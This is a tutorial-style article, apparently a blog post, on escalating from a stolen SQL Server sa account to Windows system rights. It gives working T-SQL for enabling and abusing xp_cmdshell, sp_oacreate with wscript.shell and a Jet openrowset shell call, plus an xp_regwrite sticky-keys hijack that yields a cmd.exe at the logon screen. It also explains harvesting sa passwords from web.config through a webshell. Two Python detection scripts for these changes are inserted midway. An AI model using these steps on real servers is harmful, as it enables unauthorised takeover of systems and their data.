Windows privilege escalation-SQL Server/MSSQL database privilege escalation

  • 1. Introduction
  • 2. Environment preparation
    • 2.1. Introduction to SQL Server
    • 2.2. SQL Server installation
      • 2.2.1. Main program installation steps
        • 2.2.1.1. Double-click SQLEXPR
        • 2.2.1.2. Instance configuration
        • 2.2.1.3. Server configuration
        • 2.2.1.4. Database Engine
        • 2.2.1.5. Installation complete
      • 2.2.2. Management Studio installation
        • 2.2.2.1. Installing plugins
        • 2.2.2.2. Installation
        • 2.2.2.3. Installation complete
      • 2.2.3. Using Management Studio
        • 2.2.3.1. Initialization
    • 2.3. Environment configuration
      • 2.3.1. Restart the database
      • 2.3.2. Add SA user
      • 2.3.3. Setting permissions
      • 2.3.4. Set up remote connection
      • 2.3.5. Restart the database
      • 2.3.6. Test remote connection
  • 3. Initial process
    • 3.1. Get SA account password
    • 3.2. Get remote connection status
  • 4. SQL Server privilege escalation
    • 4.1. SQL Server privilege escalation methods
    • 4.2. xp_cmdshell privilege escalation
      • 4.2.1. Get the status of xp_cmdshell
      • 4.2.2. Enable xp_cmdshell
      • 4.2.3. Executing commands
    • 4.3. sp_oacreate component privilege escalation
      • 4.3.1. Determine whether the component exists
      • 4.3.2. Determine whether the component is enabled
      • 4.3.3. Enable the component
      • 4.3.4. Executing commands
      • 4.3.5. Check the effect
      • 4.3.6. Executing commands with echo
    • 4.4. Sandbox privilege escalation
      • 4.4.1. Manage Ad Hoc Distributed Queries
      • 4.4.2. Manage sandbox mode
      • 4.4.3. Description of sandbox mode
      • 4.4.4. Executing commands
    • 4.5. xp_regwrite privilege escalation
      • 4.5.1. Query whether xp_regwrite is enabled
      • 4.5.2. Enable xp_regwrite
      • 4.5.3. Registry hijacking
      • 4.5.4. Check whether the hijacking is successful
      • 4.5.5. Test results
  • 5. Summary

1. Introduction

The privilege escalation of the database was already introduced in the previous article, Windows privilege escalation-MySQL database privilege escalation, and the overall process and methods of Windows privilege escalation were briefly introduced in Windows privilege escalation-overflow privilege escalation. I won't repeat those here and go straight to Windows privilege escalation via the SQL Server/MSSQL database.

SQL Server and MSSQL are actually the same thing, but they are called differently.

Windows Privilege Escalation-MySQL Database

Windows Privilege Escalation – Overflow Privilege Escalation

2. Environment preparation

Experimental environment: Windows system, SQL Server 2008 version

2.1. Introduction to SQL Server

Microsoft SQL Server is a powerful relational database management system based on the client/server (C/S) model. It is widely used and can be seen everywhere, from the back-end database of websites to MIS (management information systems).

Two downloads are needed here: the first, SQLEXPR, is the installer, and the second, ManagementStudio, is the management program. Pay attention to whether your system is 64-bit or 32-bit.

It is also recommended to stay connected to the Internet throughout the whole process: some plug-ins may be missing, and they can be installed automatically while online.

Download link: SQL Server Download

2.2. SQL Server installation

2.2.1. Main program installation steps

Only the important steps, which need attention during installation, are shown here. For the rest, keep the defaults and click Next, although the actual steps may differ slightly during installation.

2.2.1.1. Double-click SQLEXPR

Double-click the SQLEXPR file. After waiting a while, the following interface appears. Click “New installation or add features to an existing installation”.

2.2.1.2. Instance Configuration

By default a named instance is selected; here we change it to the default instance, and then go to the next step.

2.2.1.3. Server Configuration

Click “Use the same account for all SQL Server services”, and then select the system account.

2.2.1.4. Database Engine

Click “Add Current User” and the current user will be added automatically (normally the current user is already selected by default on this page), then go to the next step. An error may be reported here; don't worry about it, just continue to the next step.

2.2.1.5. Installation complete

The installation is complete here.

2.2.2. Management Studio installation

The installation is similar to that of the main program. Only the important steps are shown here; for the unimportant ones, just click Next. The management program here is ManagementStudio.

2.2.2.1. Installing plugins

On some computers, especially virtual machines, plug-ins may need to be installed, which is why you need to be connected to the Internet.

2.2.2.2. Installation

The same applies here: a new installation, and the following steps basically keep the defaults, so just click Next.

2.2.2.3. Installation complete

Everything is done here.

2.2.3. Using Management Studio

Find SQL Server Management Studio in the Start menu, and then you can open the management interface.

2.2.3.1. Initialization

After opening it for the first time, you need to do some simple initial configuration, and then click Connect.

2.3. Environment Configuration

For our privilege escalation test we also need some simple configuration.

2.3.1. Restart the database

Right-click the database on the page we just connected to, click “Properties”, click OK directly without clicking anything else, and then restart the database.

2.3.2. Add SA user

When using SQL Server for privilege escalation, SA user permissions are required, so we first set up an SA user here.

Click “Security”, then “Logins”, find “sa”, and set this user's password.

2.3.3. Setting permissions

Still on the properties page of the sa user, set the permissions: click the second page in the upper left, Server Roles, which lists the roles to assign to this user. Generally we use the roles with the highest authority, namely public and sysadmin.

2.3.4. Set up remote connection

Set up the remote connection here. Click the last page, Status. On this page we only need to check that the upper option, “Permission to connect to database engine”, is set to Grant.

2.3.5. Restart the database

After everything is configured, restart the database: right-click, then Restart.

2.3.6. Test remote connection

Check whether TCP/IP is enabled under the network configuration in SQL Server Configuration Manager, and then use Navicat to connect.

3. Initial process

The so-called initial process means that you first need to obtain the SA account password of the database, and then determine whether the port belongs to a SQL Server database.

3.1. Get SA account password

After obtaining a webshell, you can try to find the sa password in the directory of each site on the server (some sites connect to the database directly as sa in the web application). In general, the database connection string of a .NET site is in web.config or global.asax, and it may also be compiled into DLL files.

To be precise, obtaining the SA account password here means obtaining SA administrative authority.

3.2. Get remote connection status

It is best if the database allows remote connection. If it does not, you need to operate through the database management function of the webshell, which presupposes that a full-featured webshell has been uploaded first. Of course, with a direct remote connection you also need to make sure the account password obtained is correct.

4. SQL Server privilege escalation

4.1. SQL Server privilege escalation methods

  • xp_cmdshell privilege escalation
  • sp_oacreate privilege escalation
  • SQL Server sandbox privilege escalation
  • xp_regwrite privilege escalation

4.2. xp_cmdshell privilege escalation

xp_cmdshell can execute system commands. This component is disabled by default, so it needs to be enabled: xp_cmdshell is enabled by default in MSSQL 2000 and disabled by default in MSSQL 2005 and later. If the user has administrator (sa) authority, it can be re-enabled with sp_configure.

If the MSSQL service has been downgraded to a low-privilege account or other permission restrictions are in place, then we cannot escalate privileges.

4.2.1. Get the status of xp_cmdshell

First, get the status of xp_cmdshell. Checking it with the command shows that it is disabled.

EXEC master.dbo.xp_cmdshell 'whoami'

4.2.2. Enable xp_cmdshell

xp_cmdshell can be enabled with the following commands.

Enable:
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'xp_cmdshell',1;
reconfigure;

Disable:
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell', 0;
reconfigure;

4.2.3. Executing commands

After the above commands execute successfully, you can use the following command to run system commands, all of which execute with system authority.

EXEC master.dbo.xp_cmdshell 'whoami'

4.3. sp_oacreate component privilege escalation

When xp_cmdshell has been deleted or cannot be used, consider using sp_oacreate. The prerequisite is that the SQL Server service account (for the sysadmin login) runs as system. sp_oacreate is a stored procedure that can delete, copy and move files, and together with sp_oamethod it can write files and execute system commands.

4.3.1. Determine whether the component exists

Enter the following command; if it returns 1, the component exists, otherwise it does not.

select count(*) from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE'

4.3.2. Determine whether the component is enabled

Testing shows that the component is not enabled.

declare @shell int;
exec sp_oacreate 'wscript.shell',@shell output;
exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\1.txt';

4.3.3. Enable the component

Enable the component by executing the following commands.

Enable:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;

Disable:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE WITH OVERRIDE;

4.3.4. Executing commands

Now execute the command that failed before. Note that there is no echo when using the sp_oacreate component for privilege escalation, so the best approach is to view the output file through the webshell. If the C drive cannot be opened (insufficient permissions), you can redirect the result file to a directory you can open.

declare @shell int;
exec sp_oacreate 'wscript.shell',@shell output;
exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\1.txt';

4.3.5. Check the effect

Here we check the effect of the execution. If the command executes, the privilege escalation has basically succeeded with system authority; once confirmed, just execute the commands you want, such as enabling remote desktop, adding users, and so on.

4.3.6. Executing commands with echo

There is also an article by another author that achieves command execution with echo (the output is returned to the query).

sql server privilege escalation

declare @shell int, @exec int, @text int, @str varchar(8000)
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'exec',@exec output,'C:\Windows\System32\cmd.exe /c whoami'
exec sp_oamethod @exec, 'StdOut', @text out
exec sp_oamethod @text, 'readall', @str out
select @str;

4.4. Sandbox privilege escalation

Sandbox mode is a security feature of the database. In sandbox mode, only expressions in controls and field properties that are safe and free of malicious code are evaluated; an expression is considered safe if it does not use functions or properties that could corrupt data in some way. The prerequisites for using this method are that the SQL Server service account (for the sysadmin login) runs as system (SQL Server 2019 runs as a low-privilege mssql account by default) and that the Jet.OLEDB.4.0 driver is present on the server.

Limitations:

  • Microsoft.Jet.OLEDB.4.0 is generally only available on 32-bit operating systems
  • Windows 2008 and above have no Access database file by default; you need to upload one yourself
  • Ad Hoc Distributed Queries is disabled by default in SQL Server 2015 and needs to be enabled

4.4.1. Manage Ad Hoc Distributed Queries

Enable:
exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure;

Disable:
exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'Ad Hoc Distributed Queries',0;reconfigure;
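Each of the sp_configure toggles shown in 4.2.2, 4.3.3 and 4.4.1 writes SQL Server message 15457 ("Configuration option '...' changed from 0 to 1") to the error log, which gives a defender a place to detect them. The following Python script is an added example, not part of the original article: it scans constructed sample error-log lines and reports every risky option that was switched on.

```python
import re

# Constructed sample of SQL Server ERRORLOG lines; the message text is the
# real wording of message 15457 that sp_configure emits for each change.
SAMPLE_ERRORLOG = """\
2023-05-01 10:00:01.12 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-05-01 10:00:01.15 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-05-01 10:02:40.03 spid61      Configuration option 'Ole Automation Procedures' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-05-01 10:05:00.77 spid61      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2023-05-01 10:06:12.00 spid70      Configuration option 'max server memory (MB)' changed from 2147483647 to 4096. Run the RECONFIGURE statement to install.
2023-05-01 10:07:55.41 spid70      Configuration option 'Ad Hoc Distributed Queries' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

# The three options this article shows being enabled on the way to OS command execution.
RISKY_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "Ad Hoc Distributed Queries"}

# timestamp, spid, option name, old and new value
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<spid>spid\d+)\s+Configuration option '(?P<opt>[^']+)' "
    r"changed from (?P<old>\d+) to (?P<new>\d+)\."
)


def find_risky_enables(errorlog_text):
    """Return (timestamp, spid, option) for every risky option that went from 0 to non-zero.

    Disabling (1 -> 0) and unrelated options such as memory settings are ignored.
    """
    hits = []
    for line in errorlog_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        if m["opt"] in RISKY_OPTIONS and m["old"] == "0" and m["new"] != "0":
            hits.append((m["ts"], m["spid"], m["opt"]))
    return hits


if __name__ == "__main__":
    for ts, spid, opt in find_risky_enables(SAMPLE_ERRORLOG):
        print(f"{ts} {spid}: '{opt}' was enabled")
```

The spid lets the alert be correlated with the login that ran sp_configure in the same session.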

4.4.2. Manage sandbox mode

Here I read other people's articles, which say that the sandbox mode switch does not affect the execution of the command. Since it needs to be installed on a 32-bit system, I did not test it here.

Disable:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;

Restore:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',2;

4.4.3. Description of sandbox mode

Meaning of the sandbox mode SandBoxMode parameter (default is 2):
0: Sandbox mode disabled for all owners
1: Enabled only within the allowed scope
2: Must be in Access mode
3: Fully enabled

View sandbox mode:
exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode'

4.4.4. Executing commands

Because this requires a 32-bit installation and does not work on 64-bit, no specific test was carried out; you can see that an error is reported here.

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c whoami")')

4.5. xp_regwrite privilege escalation

Use the xp_regwrite stored procedure to modify the registry and replace a value with an arbitrary one, producing an Image File Execution Options (image) hijack. The prerequisite, of course, is that registry editing (that is, the write function) is not prohibited.

Also, if anti-virus software is present, this method may be intercepted directly, most likely because the registry modification triggers it.

4.5.1. Query whether xp_regwrite is enabled

Check here whether it is enabled: if it is, the output is 1, otherwise it is not enabled.

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_regwrite'

4.5.2. Enable xp_regwrite

I had already enabled it here, and an error was reported. I tried to disable it before and it still seemed to report an error, but it seems to be enabled by default.

Enable:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_regwrite',1;
RECONFIGURE;

Disable:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_regwrite',0;
RECONFIGURE;

4.5.3. Registry hijacking

Use xp_regwrite to modify the registry for hijacking.

EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE',@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',@value_name= 'Debugger',@type='REG_SZ',@value='c:\windows\system32\cmd.exe'

4.5.4. Check if the hijacking is successful

Then check whether the hijacking succeeded. You can see that cmd.exe is displayed below, which proves the hijacking succeeded.

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'

4.5.5. Test results

Use remote desktop or any other method to reach the logon screen where no password has been entered yet, then press Shift 5 times and cmd.exe pops up.
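As a defender-side counterpart to the hijack set up in 4.5.3 and verified in 4.5.4, the following Python script is an added example, not part of the original article: it parses a constructed sample of a .reg export of the Image File Execution Options key and lists every subkey carrying a Debugger value. The key path and the sethc.EXE entry come from the page; the devenv.exe entry is a constructed benign example showing that each hit still needs review rather than automatic deletion.

```python
import re

# Constructed sample of what `reg export` produces for the IFEO key.
# .reg files escape every backslash inside string data as '\\'.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DllNXOptions]
"mscorwks.dll"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE]
"Debugger"="c:\\windows\\system32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\devenv.exe]
"Debugger"="C:\\Program Files\\Microsoft Visual Studio\\Common7\\IDE\\devenv.exe /debugexe"
"""

# Subkeys of this path name the executable whose launch is redirected.
IFEO_PREFIX = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" + "\\"
KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"$')


def find_debugger_entries(reg_text):
    """Return (image_name, debugger_command) for each IFEO subkey that sets a Debugger value.

    The image name is lower-cased so 'sethc.EXE' and 'sethc.exe' compare equal.
    """
    entries = []
    current_image = None
    for line in reg_text.splitlines():
        k = KEY_RE.match(line)
        if k:
            key = k["key"]
            current_image = key[len(IFEO_PREFIX):].lower() if key.startswith(IFEO_PREFIX) else None
            continue
        v = VALUE_RE.match(line)
        if v and current_image and v["name"].lower() == "debugger":
            entries.append((current_image, v["data"].replace("\\\\", "\\")))
    return entries


if __name__ == "__main__":
    for image, debugger in find_debugger_entries(SAMPLE_REG_EXPORT):
        print(f"{image} -> {debugger}")
```

A Debugger value on an accessibility binary such as sethc.exe pointing at cmd.exe is the pattern this article produces and should be treated as a finding; a debugger pointing at a development tool is usually legitimate.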

5. Summary

Finally, these privilege escalation methods can basically be used on SQL Server 2008 and earlier versions and on SQL Server 2012, but some of them may not be available on 2016 or later versions, or the SA permissions may be too low, making it impossible to escalate privileges.